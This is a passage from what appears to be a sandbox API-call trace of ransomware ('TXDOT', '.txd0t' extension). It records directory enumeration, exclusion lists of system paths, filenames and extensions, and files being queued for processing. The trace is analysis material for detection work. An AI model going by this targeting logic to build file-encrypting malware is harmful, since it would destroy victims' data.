lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.374] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.374] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.374] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.374] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0090.374] GetProcessHeap () returned 0xe30000 [0090.374] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.374] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0090.374] StrCmpW (psz1="Libraries", psz2=".") returned 1 [0090.374] StrCmpW (psz1="Libraries", psz2="..") returned 1 [0090.375] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.375] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.375] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Libraries", cchMax=1056 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0090.375] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system32\\") returned 0x0 [0090.375] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.375] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\local\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\boot\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\perflogs\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\programdata\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\drivers\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\wsus\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="crypt_detect") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="cryptolocker") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="ransomware") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\WINDOWS") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.379] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files") returned 0x0 [0090.379] GetProcessHeap () returned 0xe30000 [0090.379] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xedc0f8 [0090.379] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0090.379] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0090.379] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0090.379] StrCmpW (psz1=".", psz2=".") returned 0 [0090.379] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb207547d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.380] StrCmpW (psz1="..", psz2=".") returned 1 [0090.380] StrCmpW (psz1="..", psz2="..") returned 0 [0090.380] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.380] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.380] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.380] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0090.380] StrCmpW (psz1="RecordedTV.library-ms", psz2=".") returned 1 [0090.380] StrCmpW (psz1="RecordedTV.library-ms", psz2="..") returned 1 [0090.380] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0090.380] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0090.380] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="RecordedTV.library-ms", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0090.380] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0090.380] StrCmpW (psz1=".library-ms", psz2=".txd0t") returned -1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="bootsect.bak") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="iconcache.db") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="thumbs.db") returned -1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2=" ransomware ") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2=" ransom ") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="debug.txt") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="boot.ini") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="desktop.ini") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="autorun.inf") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntuser.dat") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntldr") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="ntdetect.com") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="bootfont.bin") returned 1 [0090.380] StrCmpIW (psz1="RecordedTV.library-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.380] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0090.380] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".library-ms") returned 0x0 [0090.380] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0090.380] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0090.381] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0090.381] SetEvent (hEvent=0x3fc) returned 1 [0090.383] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0090.383] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0090.383] GetProcessHeap () returned 0xe30000 [0090.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.384] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0090.384] StrCmpW (psz1="Music", psz2=".") returned 1 [0090.384] StrCmpW (psz1="Music", psz2="..") returned 1 [0090.384] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.384] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.384] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0090.384] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0090.384] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.384] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\boot\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0090.385] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\programdata\\") returned 0x0 [0090.386] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\drivers\\") returned 0x0 [0090.386] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\wsus\\") returned 0x0 [0090.386] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.386] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.386] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="crypt_detect") returned 0x0 [0090.387] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="cryptolocker") returned 0x0 [0090.387] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="ransomware") returned 0x0 [0090.391] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0090.394] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.394] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files") returned 0x0 [0090.394] GetProcessHeap () returned 0xe30000 [0090.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xedc0f8 [0090.394] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Music", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0090.394] StrNCatW (in: psz1="C:\\Users\\Public\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0090.394] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.394] StrCmpW (psz1=".", psz2=".") returned 0 [0090.394] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.394] StrCmpW (psz1="..", psz2=".") returned 1 [0090.394] StrCmpW (psz1="..", psz2="..") returned 0 [0090.394] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.395] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.395] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.395] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.395] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.395] GetProcessHeap () returned 0xe30000 [0090.395] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.395] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0090.395] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0090.395] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0090.395] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.395] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.395] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="crypt_detect") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="cryptolocker") returned 0x0 [0090.395] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="ransomware") returned 0x0 [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0090.396] GetProcessHeap () returned 0xe30000 [0090.396] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xedc0f8 [0090.396] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0090.396] StrNCatW (in: psz1="C:\\Users\\Public\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0090.396] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20b0 [0090.396] StrCmpW (psz1=".", psz2=".") returned 0 [0090.396] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.396] StrCmpW (psz1="..", psz2=".") returned 1 [0090.396] StrCmpW (psz1="..", psz2="..") returned 0 [0090.396] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.396] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.396] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.396] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.396] FindClose (in: hFindFile=0xec20b0 | out: hFindFile=0xec20b0) returned 1 [0090.396] GetProcessHeap () returned 0xe30000 [0090.396] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.396] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0090.396] StrCmpW (psz1="Videos", psz2=".") returned 1 [0090.396] StrCmpW (psz1="Videos", psz2="..") returned 1 [0090.396] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.396] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.396] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.396] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0090.397] 